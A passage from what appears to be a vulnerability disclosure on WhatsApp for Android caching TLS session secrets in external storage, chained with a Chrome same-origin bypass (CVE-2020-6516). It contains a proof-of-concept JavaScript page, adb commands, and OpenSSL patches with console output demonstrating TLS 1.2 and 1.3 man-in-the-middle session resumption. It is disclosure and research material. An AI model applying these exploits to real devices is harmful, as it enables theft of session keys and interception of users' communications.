_data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0029.jpeg Row: 324 _id=734, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0032.jpeg Row: 325 _id=735, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0035.jpeg ... Apart from the last few lines, where paths to various image files are shown, there are plenty of interesting entries in the above listing. Backups, databases, and the more suspicious-looking SSLSessionCache and watls-sessions. For the uninitiated, /storage/emulated/0 is a synonym for /sdcard, i.e. the external storage path. Apps bearing the READ_EXTERNAL_STORAGE permission may obtain access to any file stored in external storage in Android 9 and previous Android versions. It is also essential to note that file identifiers like 323, 324 and 325 shown above, are just sequential integers which can be guessed or even bruteforced. On a typical Android device, these identifiers usually fall within the range of tenths of thousands. The Chrome CVE-2020-6516 Same-Origin-Policy bypass The Same Origin Policy (SOP) [12] in browsers dictates that Javascript content of URL A will only be able to access content at URL B if the following URL attributes remain the same for A and B: The protocol e.g. https vs. http The domain e.g. www.example1.com vs. www.example2.com The port e.g. www.example1.com:8080 vs. www.example1.com:8443 Of course, there are exceptions to the above rules, but in general, a resource from https://www.example1.com (e.g. a piece of Javascript code) cannot access the DOM of a resource on https://www.example2.com, as this would introduce serious information leaks. Unless a Cross-Origin-Resource-Sharing (CORS) policy explicitly allows so, it shouldn't be possible for a web resource to bypass the SOP rules. It's essential to note that Chrome considers content:// to be a local scheme, just like file://. In this case SOP rules are even more strict, as each local scheme URL is considered a separate origin. For example, Javascript code in file:///tmp/test.html should not be able to access the contents of file:///tmp/test2.html, or any other file on the filesystem for that matter. Consequently, according to SOP rules, a resource loaded via content:// should not be able access any other content:// resource. Well, vulnerability CVE-2020-6516 of Chrome created an "exception" to this rule. CVE-2020-6516 [03] is a SOP bypass on resources loaded via a content:// URL. For example, Javascript code, running from within the context of an HTML document loaded from content://com.example.provider/test.html, can load and access any other resource loaded via a content:// URL. This is a serious vulnerability, especially on devices running Android 9 or previous versions of Android. On these devices scoped storage [13] is not implemented and, consequently, application-specific data under /sdcard, and more interestingly under /sdcard/Android, can be accessed via the system's Media Store content provider. A proof-of-concept is pretty straightforward. An HTML document that uses XMLHttpRequest to access arbitrary content:// URLs is uploaded under /sdcard. It is then added in the Media Store and rendered in Chrome, in a fashion similar to the example shown earlier. For demonstration purposes, one can attempt to load content://media/external/file/747 which is, in fact, the Media Store URL of the "Hello, world!" example. Surprisingly, the Javascript code, running within the origin of the HTML document, will fetch and display the contents of test.txt. <html> <head> <title>PoC</title> <script type="text/javascript"> function poc() { var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if(this.readyState == 4) { if(this.status == 200 || this.status == 0) { alert(xhr.response); } } } xhr.open("GET", "content://media/external/file/747"); xhr.send(); } </script> </head> <body onload="poc()"></body> </html> To see this in action, upload the HTML document, shown above, on the device under /sdcard/test.html. Then insert it in the Media Store's database: $ content insert --uri content://media/external/file \ --bind _data:s:/storage/emulated/0/test.html \ --bind mime_type:s:text/html To read the identifier of the newly inserted file, execute the following command. In this example, test.html's _id is 617. $ content query --uri content://media/external/file \ --projection _id,_data | grep test.html Row: 312 _id=617, _data=/storage/emulated/0/test.html To execute the proof-of-concept code, open content://media/external/file/617 in Chrome. You should see something like the following: One may ask, "but how is WhatsApp related to this Chrome vulnerability?". If an attacker sends a malicious HTML file to a victim user over WhatsApp, then when this file is viewed it will actually be rendered using Chrome. Chrome will use a content provider internal to WhatsApp to access the malicious Javascript content. However, due to the CVE-2020-6516 Chrome bug the malicious code will be able to access any other resource from any other content provider on the system. The astute reader might remember that we had found that WhatsApp placed the SSLSessionCache and watls-sessions directories under unprotected external storage. These directories contain TLS session cryptographic material. This material could have been collected in the way we just explained, by a remote attacker through a phishing attack. In the sections that follow we will explain how session resumption works for TLS 1.3 and TLS 1.2, but also how the collected cryptographic material could be used to conduct man-in-the-middle attacks to victim users. Session Resumption and Pre-Shared Keys in TLS 1.3 TLS connections go through a process referred to as the TLS handshake. During this process, communicating peers will authenticate each other, negotiate cryptographic parameters and determine various aspects of the connection via a set of agreed-upon extensions. Server identity authentication uses asymmetric cryptography (for X509 certificate validation etc.), which is a computationally intensive process, especially for smaller form-factor embedded devices (e.g. mobile phones). For TLS 1.3, the handshake protocol is analyzed in section 4 of RFC 8446 [17]. To reduce power-consumption and save CPU cycles when multiple or simultaneous TLS connections are established in a short period of time, session resumption was proposed. In TLS 1.3 session resumption in based on Pre-Shared Keys (PSKs). PSKs are typically established in-band after a successful certificate-based authentication (but it is possible to also establish these out-of-band through, for example, secrets on a piece of paper). During session resumption, knowledge of the PSK will act as the sole authentication mechanism between the client and the server. No other (certificate-based etc.) authentication will be required by the communicating peers. Avoiding the asymmetric cryptography of certificate-based authentication in session resumption makes it faster and greener in terms of power consumption. The above leads to an interesting conclusion: If a remote attacker could collect the PSK from the client device, then it would be possible to perform a man-in-the-middle attack to this client when in TLS session resumption, as no certificate validation would be performed against the fraudulent server endpoint. In Android, certificate validation is performed by the framework, but application developers are allowed to override this process for the purpose of implementing their own custom certificate handling/pinning mechanism. Certificate pinning enables apps to only proceed to a connection if the presented certificate has certain characteristics (e.g. has a certain public key, is signed by a certain intermediate certificate etc.). The class responsible for handling server-presented certificates is X509TrustManager and developers are free to inherit and override its checkServerTrusted() method. However, as no certificate validation is performed in TLS session resumption, the X509TrustManager is never consulted, and thus no standard or custom certificate validation (e.g. pinning checks) will take place. This becomes the perfect opportunity for a man-in-the-middle attack. Page 8 of RFC8446 for TLS 1.3, notes that: Session resumption with and without server-side state as well as the PSK-based cipher suites of earlier TLS versions have been replaced by a single new PSK exchange. This means that all PSK related actions have been homogenized (both PSK-cipher suites and PSK for session resumption) in TLS 1.3. This makes it easy for us to create the man-in-the-middle endpoint for session resumption through standard tools such as the openssl s_server implementation. The attacker controlled s_server instance does not need to do a lookup for the right PSK to use in the incoming connection, as this can be fixed to the collected one (through the -psk parameter). Furthermore, TLS 1.3 uses a PSK binder value, to have the client prove to the server that it is indeed the true owner of a previously established PSK. The attacker controlled endpoint is free to ignore this value, and will proceed to establishing the connection as implemented in our patch for openssl, found in the PoC repository [37] under openssl-1.1.1f-patches/watls-mitm.patch. To demonstrate the above lets use the OpenSSL client to connect to one of WhatsApp's servers that uses TLS v1.3. Session information can be stored, for resumption at a later time, using the -sess_out command line switch, as shown below: $ openssl s_client -host media-sof1-1.cdn.whatsapp.net -port 443 -sess_out /tmp/session.pem Let's have a look at the corresponding PSK: $ openssl sess_id -in /tmp/session.pem -text | grep PSK Resumption PSK: C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353 PSK identity: None PSK identity hint: None Next, follow the instructions in our PoC's watls_psk_extract/README.md to prepare a modified OpenSSL variant, capable of performing TLS v1.3 MitM, and execute run_server.sh, passing it the extracted PSK, as shown below: $ cd watls_psk_extract $ ./run_server.sh C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353 Using PSK C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353 Running WaTLS version ACCEPT If our theory is correct, one can now use /tmp/session.pem to connect to localhost and resume the session that was initially established with media-sof1-1.cdn.whatsapp.net. Indeed, using OpenSSL's s_client and the -sess_in command line switch, we can do the following: $ openssl s_client -sess_in /tmp/session.pem -host localhost -port 443 CONNECTED(00000006) Can't use SSL_get_servername --- Server certificate -----BEGIN CERTIFICATE----- MIIF1zCCBL+gAwIBAgIQDOmsxODES4Klhbv8cv6EizANBgkqhkiG9w0BAQsFADBw MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 d3cuZGlnaWNlcnQuY29tMS8wLQYDVQQDEyZEaWdpQ2VydCBTSEEyIEhpZ2ggQXNz dXJhbmNlIFNlcnZlciBDQTAeFw0yMTAyMTAwMDAwMDBaFw0yMTA1MTAyMzU5NTla MGkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRMwEQYDVQQHEwpN ZW5sbyBQYXJrMRcwFQYDVQQKEw5GYWNlYm9vaywgSW5jLjEXMBUGA1UEAwwOKi53 aGF0c2FwcC5uZXQwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAARnhHhwhX0sqHwl bcIQUCcf6974FldeoPmrHOOEDPGSxeRVRxOXRaGjfX72Xlakyz5WpJx8uSlghjjz qvaTeBNwo4IDPTCCAzkwHwYDVR0jBBgwFoAUUWj/kK8CB3U8zNllZGKiErhZcjsw HQYDVR0OBBYEFDGwR2i4anDM4OmK42mRNINbzAxdMHQGA1UdEQRtMGuCEiouY2Ru LndoYXRzYXBwLm5ldIISKi5zbnIud2hhdHNhcHAubmV0gg4qLndoYXRzYXBwLmNv bYIOKi53aGF0c2FwcC5uZXSCBXdhLm1lggx3aGF0c2FwcC5jb22CDHdoYXRzYXBw Lm5ldDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUF BwMCMHUGA1UdHwRuMGwwNKAyoDCGLmh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9z aGEyLWhhLXNlcnZlci1nNi5jcmwwNKAyoDCGLmh0dHA6Ly9jcmw0LmRpZ2ljZXJ0 LmNvbS9zaGEyLWhhLXNlcnZlci1nNi5jcmwwPgYDVR0gBDcwNTAzBgZngQwBAgIw KTAnBggrBgEFBQcCARYbaHR0cDovL3d3dy5kaWdpY2VydC5jb20vQ1BTMIGDBggr BgEFBQcBAQR3MHUwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNv bTBNBggrBgEFBQcwAoZBaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lD ZXJ0U0hBMkhpZ2hBc3N1cmFuY2VTZXJ2ZXJDQS5jcnQwDAYDVR0TAQH/BAIwADCC AQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2AH0+8viP/4hVaCTCwMqeUol5K8UOeAl/ LmqXaJl+IvDXAAABd4q64v0AAAQDAEcwRQIgKZOZs5XzLPIAR1XcJzkjS721qtTO 7HnHtN9lQ6gmLjUCIQCiJCYvSURNjEWk+OKy9DJQ8J19BeZTXPqQtEq3HrcTLwB3 AFzcQ5L+5qtFRLFemtRW5hA3+9X6R9yhc5SyXub2xw7KAAABd4q64skAAAQDAEgw RgIhAKzh5Q+vXt+C9HS7r+H1ZjJIQeK11tLGnBNGVFAExeSLAiEAsAW8HhwfFSBE sHaeIUyKt1xq03qjfjLmy6FQnE3lDj8wDQYJKoZIhvcNAQELBQADggEBAF+XRlKE eval5PuqA1hKHJRtvP5uQUneXLAS+ch1pjhfveKjUuiWm+04y+liSlVRoGNm/6Og GEg9CrCMu2SlFsD6UMsK6BMmb3HWcFH5P9HY1so1cIsXcpSxwJEDbZD8ATDA1rH3 komGIYbzgMbcfMi/mjyXTvxrdaBp5QnT32PzOxMyYuWn2gg3n7wxBKppyGuuqarP tIXuIsBkLe+6k1S0+gvuRS4l28V/BD985eQZJg8/KE6061v/aLNBlP3anIksH9AJ 9j1zerIq9cL7NEcvz1PEu97D1SpBH75znPAHArtjXa/0U7SRwQxahx8a82pl/+Zb rGufx1+jMcviB6M= -----END CERTIFICATE----- subject=C = US, ST = California, L = Menlo Park, O = "Facebook, Inc.", CN = *.whatsapp.net issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 High Assurance Server CA --- No client certificate CA names sent Server Temp Key: X25519, 253 bits --- SSL handshake has read 225 bytes and written 534 bytes Verification: OK --- Reused, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256 Server public key is 256 bit Secure Renegotiation IS NOT supported Compression: NONE Expansion: NONE No ALPN negotiated Early data was not sent Verify return code: 0 (ok) --- --- Post-Handshake New Session Ticket arrived: SSL-Session: Protocol : TLSv1.3 Cipher : TLS_AES_128_GCM_SHA256 Session-ID: D600D456331645CDF46A5426F3CE7801CE228B98195D7E511D8A5F4F783F225F Session-ID-ctx: Resumption PSK: ACEE401AC866A076351CD495517260327104CF08BD1CBFB75299ADB658991B2C PSK identity: None PSK identity hint: None SRP username: None TLS session ticket lifetime hint: 304 (seconds) TLS session ticket: 0000 - ff 64 91 18 ea 0a 17 1c-2f 10 20 52 ef 08 7a 8a .d....../. R..z. 0010 - 94 91 f4 ff 47 f0 28 d4-78 e5 65 a0 6d f0 c0 fe ....G.(.x.e.m... Start Time: 1615551534 Timeout : 7200 (sec) Verify return code: 0 (ok) Extended master secret: no Max Early Data: 0 --- read R BLOCK read:errno=0 There are a few things worth noting in the above output. First and foremost, the certificate displayed does not come from the TLS handshake, but was deserialized directly from /tmp/session.pem, as the latter was used for session resumption purposes. Next, looking carefully, one can see a message reading Verification: OK, despite the fact our MitM server uses a self-signed certificate. Furthermore, a few lines below, we are informed that the session was reused (Reused, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256) and that verification was indeed successful (Verify return code: 0 (ok)). From the client's perspective, everything seems normal and the connection is resumed. The modified s_server accepts the connection, but receives a PSK binder which is HMAC'ed by an unknown key pair. However, the binder is ignored, and since the exact PSK value was specified at the command line, connection establishment can proceed as usual. When that happens, the following output is printed at the server's console: $ ./run_server.sh C4B33F312F10EBB2B7EE125EB8C686DF83E85D740F49B5CE6EB09499065B3353 ... PSK warning: client identity not what we expected (got '...' expected 'Client_identity') Ignoring PSK binders! Another thing to note here is that, clearly, the PSK identity is not important for the server. It is just a lookup key in a cache, a hash table of PSKs for example, and does not constitute a cryptographic proof of any kind. The server accepts the connection despite the fact that a different PSK identity was expected. Session Resumption and the Master Secret in TLS 1.2 In TLS 1.2 session resumption is based solely on Master Secret knowledge; if the two communicating parties have saved their previous state in a secure location, they can continue communicating by re-deriving new session keys based on the previously agreed upon shared secret. As with TLS 1.3, session resumption does not go through any other form of authentication (e.g. certificate validation). The handshake protocol of TLS 1.2 is analyzed in section 7 of RFC 5246 [21], while session resumption in section F.1.4: "When a connection is established by resuming a session, new ClientHello.random and ServerHello.random values are hashed with the session's master_secret. Provided that the master_secret has not been compromised and that the secure hash operations used to produce the encryption keys and MAC keys are secure, the connection should be secure and effectively independent from previous connections. Attackers cannot use known encryption keys or MAC secrets to compromise the master_secret without breaking the secure hash operations." "The client sends a ClientHello using the Session ID of the session to be resumed. The server then checks its session cache for a match. If a match is found, and the server is willing to re-establish the connection under the specified session state, it will send a ServerHello with the same Session ID value." Again, the session ID serves no cryptographic purpose other than probably playing the role of an index in the server's session cache. Moreover, it should be noted that the use of extended master secrets [22] does not protect from stolen master keys. To see how this works in practice, one can do the following. First, connect to one of WhatsApp's servers using TLS v1.2 and store the session on disk using -sess_out as shown below: $ openssl s_client -tls1_2 -host crashlogs.whatsapp.net -port 443 -sess_out /tmp/session.pem Carefully examine the output of the above command. There should be no verification errors or anything alike, as WhatsApp's infrastructure uses certificates issued by DigiCert. The session identifier and the master secret of the saved session can be examined using the following command: $ openssl sess_id -in /tmp/session.pem -text | egrep '(Master|Session)' SSL-Session: Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A Session-ID-ctx: Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137 Now, enter directory tls12_psk_extract in the PoC repository [37], copy /tmp/session.pem and convert it to DER format: $ pwd [..]/whatsapp-mitd-mitm/tls12_psk_extract $ cp /tmp/session.pem . $ openssl sess_id -inform PEM -in session.pem -outform DER -out session.der Unfortunately, unlike s_client, OpenSSL's s_server does not allow specifying a master secret or a session ID at the command line for the purpose of accepting resumed TLS 1.2 sessions (i.e. there's no -psk equivalent for TLS 1.2). For this purpose, we modified OpenSSL's ssl/ssl_sess.c to have s_server load a TLS session from an external DER file. Consider it similar to -sess_in of s_client. + /* CENSUS: Load the BoringSSL session converted to OpenSSL format. */ + if(ret == NULL) { + int fd; + char buf[4096], *bufp = &buf[0]; + size_t size; + SSL_SESSION *session; + + printf("[CENSUS] Loading BoringSSL session from %s\n", SESSION_FILE); + + if((fd = open(SESSION_FILE, O_RDONLY)) >= 0) { + + size = read(fd, buf, sizeof(buf)); + printf("[CENSUS] Loaded %zu bytes\n", size); + + if((session = d2i_SSL_SESSION(NULL, (const unsigned char **)&bufp, size)) != NULL) { + printf("[CENSUS] Session was successfully loaded at %p\n", (void *)session); + ret = session; + } + + close(fd); + } + } With this modification, a client can save TLS session information in a DER file, using -sess_out, and then have an s_server instance load that file during TLS 1.2 handshake. The effect is similar to the -psk example demonstrated previously; the client with prior knowledge of the session ID and the master secret will successfully establish the TLS connection. The corresponding OpenSSL modifications can be found, in our PoC repository [37], at openssl-1.1.1f-patches/tls12-mitm.patch. Follow the instructions in tls12_psk_extract/README.md to prepare an OpenSSL 1.1.1f variant capable of performing TLS 1.2 MitM. When ready, just run the MitM server: $ ./run_server.sh ... Running TLS v1.2 version Using default temp DH parameters ACCEPT Using s_client attempt to resume the session initially established with crashlogs.whatsapp.net, but this time connect to localhost instead. To do this, use the -sess_in command line switch, as shown below: $ openssl s_client -tls1_2 -host localhost -port 443 -sess_in /tmp/session.pem CONNECTED(00000006) --- Server certificate -----BEGIN CERTIFICATE----- MIIF1zCCBL+gAwIBAgIQDOmsxODES4Klhbv8cv6EizANBgkqhkiG9w0BAQsFADBw MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 d3cuZGlnaWNlcnQuY29tMS8wLQYDVQQDEyZEaWdpQ2VydCBTSEEyIEhpZ2ggQXNz dXJhbmNlIFNlcnZlciBDQTAeFw0yMTAyMTAwMDAwMDBaFw0yMTA1MTAyMzU5NTla MGkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRMwEQYDVQQHEwpN ZW5sbyBQYXJrMRcwFQYDVQQKEw5GYWNlYm9vaywgSW5jLjEXMBUGA1UEAwwOKi53 aGF0c2FwcC5uZXQwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAARnhHhwhX0sqHwl bcIQUCcf6974FldeoPmrHOOEDPGSxeRVRxOXRaGjfX72Xlakyz5WpJx8uSlghjjz qvaTeBNwo4IDPTCCAzkwHwYDVR0jBBgwFoAUUWj/kK8CB3U8zNllZGKiErhZcjsw HQYDVR0OBBYEFDGwR2i4anDM4OmK42mRNINbzAxdMHQGA1UdEQRtMGuCEiouY2Ru LndoYXRzYXBwLm5ldIISKi5zbnIud2hhdHNhcHAubmV0gg4qLndoYXRzYXBwLmNv bYIOKi53aGF0c2FwcC5uZXSCBXdhLm1lggx3aGF0c2FwcC5jb22CDHdoYXRzYXBw Lm5ldDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUF BwMCMHUGA1UdHwRuMGwwNKAyoDCGLmh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9z aGEyLWhhLXNlcnZlci1nNi5jcmwwNKAyoDCGLmh0dHA6Ly9jcmw0LmRpZ2ljZXJ0 LmNvbS9zaGEyLWhhLXNlcnZlci1nNi5jcmwwPgYDVR0gBDcwNTAzBgZngQwBAgIw KTAnBggrBgEFBQcCARYbaHR0cDovL3d3dy5kaWdpY2VydC5jb20vQ1BTMIGDBggr BgEFBQcBAQR3MHUwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNv bTBNBggrBgEFBQcwAoZBaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lD ZXJ0U0hBMkhpZ2hBc3N1cmFuY2VTZXJ2ZXJDQS5jcnQwDAYDVR0TAQH/BAIwADCC AQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2AH0+8viP/4hVaCTCwMqeUol5K8UOeAl/ LmqXaJl+IvDXAAABd4q64v0AAAQDAEcwRQIgKZOZs5XzLPIAR1XcJzkjS721qtTO 7HnHtN9lQ6gmLjUCIQCiJCYvSURNjEWk+OKy9DJQ8J19BeZTXPqQtEq3HrcTLwB3 AFzcQ5L+5qtFRLFemtRW5hA3+9X6R9yhc5SyXub2xw7KAAABd4q64skAAAQDAEgw RgIhAKzh5Q+vXt+C9HS7r+H1ZjJIQeK11tLGnBNGVFAExeSLAiEAsAW8HhwfFSBE sHaeIUyKt1xq03qjfjLmy6FQnE3lDj8wDQYJKoZIhvcNAQELBQADggEBAF+XRlKE eval5PuqA1hKHJRtvP5uQUneXLAS+ch1pjhfveKjUuiWm+04y+liSlVRoGNm/6Og GEg9CrCMu2SlFsD6UMsK6BMmb3HWcFH5P9HY1so1cIsXcpSxwJEDbZD8ATDA1rH3 komGIYbzgMbcfMi/mjyXTvxrdaBp5QnT32PzOxMyYuWn2gg3n7wxBKppyGuuqarP tIXuIsBkLe+6k1S0+gvuRS4l28V/BD985eQZJg8/KE6061v/aLNBlP3anIksH9AJ 9j1zerIq9cL7NEcvz1PEu97D1SpBH75znPAHArtjXa/0U7SRwQxahx8a82pl/+Zb rGufx1+jMcviB6M= -----END CERTIFICATE----- subject=C = US, ST = California, L = Menlo Park, O = "Facebook, Inc.", CN = *.whatsapp.net issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 High Assurance Server CA --- No client certificate CA names sent --- SSL handshake has read 141 bytes and written 485 bytes Verification error: unable to get local issuer certificate --- Reused, TLSv1.2, Cipher is ECDHE-ECDSA-AES128-GCM-SHA256 Server public key is 256 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE No ALPN negotiated SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-ECDSA-AES128-GCM-SHA256 Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A Session-ID-ctx: Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137 PSK identity: None PSK identity hint: None SRP username: None TLS session ticket lifetime hint: 172800 (seconds) TLS session ticket: 0000 - 8b 5b f6 5b c6 05 a2 36-48 88 79 8e 5d e6 55 f8 .[.[...6H.y.].U. 0010 - e2 75 43 33 a5 84 b4 8e-60 38 ee e8 bb a8 69 ad .uC3....`8....i. 0020 - 56 cb 6e a4 9a f4 93 fd-0a 67 51 f4 68 0d 59 40 V.n......gQ.h.Y@ 0030 - 49 80 97 7b ce 9f 6b fb-73 27 65 df 0e c3 8f b6 I..{..k.s'e..... 0040 - f7 9a 9c 31 2f b3 e3 8b-32 9c d3 0d 46 30 84 d3 ...1/...2...F0.. 0050 - 89 5c 82 a7 28 9a 41 18-53 9e fa 58 b1 80 78 62 .\..(.A.S..X..xb 0060 - b3 f6 bc ce bd e5 5b 40-f1 14 16 b4 66 b4 80 48 ......[@....f..H 0070 - 1c ba d2 ed 23 9f cd 80-b2 56 a1 e8 0f 6b 6d e2 ....#....V...km. 0080 - 03 40 ba 92 3a f4 a6 b9-ef 35 8e 87 68 6e 54 1a .@..:....5..hnT. 0090 - 05 ac eb 5c 2b c4 52 3d-ca f8 6d 91 22 ce 21 d5 ...\+.R=..m.".!. 00a0 - d4 56 32 35 23 a2 6c 20-31 0e 71 b6 04 24 ac 64 .V25#.l 1.q..$.d 00b0 - 8f bb 77 d7 97 04 bc 73-71 ff 86 0c e3 a7 45 2e ..w....sq.....E. 00c0 - 16 dc ac b9 61 9f 60 d9-c3 cb 2d 73 87 33 53 32 ....a.`...-s.3S2 Start Time: 1616078131 Timeout : 7200 (sec) Verify return code: 20 (unable to get local issuer certificate) Extended master secret: yes --- Notice that, at the client side, no verification takes place and no error is shown. Since the session identifier and the master secret are both known, the encrypted session is resumed normally. Indeed, taking a closer look at the output above, reveals that the session identifier and the master secret have been successfully reused, as they match those of /tmp/session.pem: SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-ECDSA-AES128-GCM-SHA256 Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A Session-ID-ctx: Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137 At the server side, our modified OpenSSL server loads session.der (produced from /tmp/session.pem), loads the session identifier and the master secret from there, and resumes the session as if nothing is wrong. The following output is displayed: $ ./run_server.sh ... [CENSUS] Looking up session 6b0b3946bc2cb7a1... [CENSUS] SSL_SESS_CACHE_NO_INTERNAL_LOOKUP not set! [CENSUS] Loading BoringSSL session from session.der [CENSUS] Loaded 1877 bytes [CENSUS] Session was successfully loaded at 0x7fc168d21e90 [CENSUS] Session cache miss, no problem! The session identifier was not found in the server's cache. This is no problem for our MitM server, as a stolen session (session.der) is explicitly loaded and reused, as if it was found in the cache in the first place. At this point the client believes it is communicating securely, however its communications are subject to eavesdropping and modification by the man-in-the-middle server! The WhatsApp TLS Man-in-the-Disk Vulnerabilities Privacy is one of WhatsApp's major features. It is achieved by using end-to-end encryption [23] in messages exchanged between clients, as well as through the use of TLS 1.3 / TLS 1.2 for client to server communications (the actual protocol used depends on the endpoint) [24]. To take advantage of the benefits offered by TLS session resumption, WhatsApp implements its own TLS-PSK session management code for TLS 1.3 and uses FileClientSessionCache [25] for TLS 1.2. The logic is pretty simple; when a TLS connection is initiated, WhatsApp looks for a previously stored session on the device's filesystem. If one is found, a PSK or master secret is loaded from there and the session is resumed. Otherwise, a full TLS handshake takes place, after which PSK/master secrets might be established and stored for future use. The above TLS session management code introduced two identical man-in-the-disk ulnerabilities, one affecting TLS 1.2 connections and one affecting TLS 1.3 connections. The problem is that WhatsApp stores the aforementioned TLS session information in the directory returned by Context.getExternalCacheDir(). This directory lies under the external storage of /sdcard. Any Android app holding the READ_EXTERNAL_STORAGE or WRITE_EXTERNAL_STORAGE permission could gain read / write access to these files through the filesystem, on Android 10 and previous versions of Android. Alternatively, these files were indexed and made available to other apps through the Media Store content provider on Android 9 and previous versions of Android. WaTLS (WhatsApp TLS) is WhatsApp's custom Java implementation of TLS 1.3. WaTLS is a full TLS stack, developed from scratch, that comes with its own TLS state machine, packet parsing logic and so on. When connected to the WhatsApp network, a WhatsApp client receives configuration information from the upstream servers. Among others, the aforementioned configuration controls whether the client should use WaTLS or fall back to the external SSL cache. WaTLS is mostly used for media downloads, including end-to-end (E2E) encrypted media exchanged by users. Other than that, it is used behind the scenes when newly updated WhatsApp installations upload crash statistics to WhatsApp cloud servers (e.g. memory dumps). Additionally, it seems to have limited usage in VoIP scenarios, but the author has not investigated this further. As shown below, the WatlsCache class controlling access to TLS session information cached on disk, stores all data under the directory returned by application.getExternalCacheDir(). The getWatlsFileName() method is called to retrieve the filename that stores the TLS session information corresponding to the session identifier argument. public class WatlsCache implements WatlsCacheInterface { public static final WatlsCache instance = new WatlsCache(); public String watlsDirName; static { ... if(application != null && application.getExternalCacheDir() != null) { String A0C = AnonymousClass0CC.concatStrings(r1.application.getExternalCacheDir().getAbsolutePath(), "/", "watls-sessions"); File file = new File(A0C); ... instance.watlsDirName = A0C; } } ... public final String getWatlsFileName(byte[] bArr) { return this.watlsDirName + "/" + Base64.encodeToString(bArr, 10); } } Cached items bear filenames that encode (serialize) information about the TLS session endpoint. See for example the following filename which bears base64 encoded information about the hostname, port and cipher suite of a WhatsApp endpoint. $ echo 'bWVkaWEuZmF0aDQtMi5mbmEud2hhdHNhcHAubmV0IzQ0MyNUTFNfQUVTXzEyOF9HQ01fU0hBMjU2' | base64 -D media.fath4-2.fna.whatsapp.net#443#TLS_AES_128_GCM_SHA256 For TLS 1.2 connections, WhatsApp relies on facilities offered by Java and consequently by the Android framework. The TLS 1.2 mechanism is used for profile picture and sticker pack downloads, sonar pingback (related to location sharing), WhatsApp payments, but also for account registration and verification procedures. Last but not least, devices running WhatsApp, that come with no Google Play Store services (com.android.vending) pre-installed, communicate with https://www.whatsapp.com over TLS 1.2 to determine the latest version of the APK and, if needed, download the app and install it. In TLS 1.2, file-based storage of TLS sessions is achieved via SSLSessionCache [28], whose constructor takes a File instance, pointing to the directory where sessions will be stored. An SSLSocketFactory descendant is used to actually create SSL sockets utilizing the external SSL session cache. The entry point to this logic is ExternalSSLCacheEnabledSSLSocketFactoryInterface (X.1Sb), shown below. public abstract class ExternalSSLCacheEnabledSSLSocketFactoryInterface extends SSLSocketFactory { ... public final SSLSessionCache externalSSLSessionCache; ... static { File externalCacheDir = context.getExternalCacheDir(); SSLSessionCache sslSessionCache = new SSLSessionCache(new File(externalCacheDir, "SSLSessionCache")); this.externalSSLSessionCache = sslSessionCache; } } Again, we see that context.getExternalCacheDir() is consulted to identify the path where cached TLS session items will be stored. An adversary that has somehow gained access to the external cache directory (e.g. through a rogue or vulnerable application) can steal TLS 1.3 PSK keys and TLS 1.2 Master Secrets. As already discussed, this could lead to successful man-in-the-middle attacks. For the purposes of this article we will use the previously described SOP bypass vulnerability in Chrome, to remotely access the TLS session secrets. All an attacker has to do is lure the victim into opening an HTML document attachment. WhatsApp will render this attachment in Chrome, over a content provider, and the attacker's Javascript code will be able to steal the stored TLS session keys. Convincing a user to actually open an HTML document is an art by itself. However, as it will become clear later, the protobuf-based WhatsApp messaging protocol could aid the attacker in this respect. From TLS secrets collection to Remote Code Execution This section explores two attacks against WhatsApp, one leading to code execution and one leading to leakage of Noise protocol keys, used in end-to-end encryption of user communications. The former requires the TLS 1.2 man-in-the-middle capability, while the latter requires a combination of TLS 1.2 and TLS 1.3 man-in-the-middle capabilities. As the TLS 1.3 man-in-the-disk vulnerability was patched at the time we were creating the demo for the issue, we emulated the TLS 1.3 man-in-the-middle capability through Frida in the second attack (forcing connections over TLS 1.2). If you 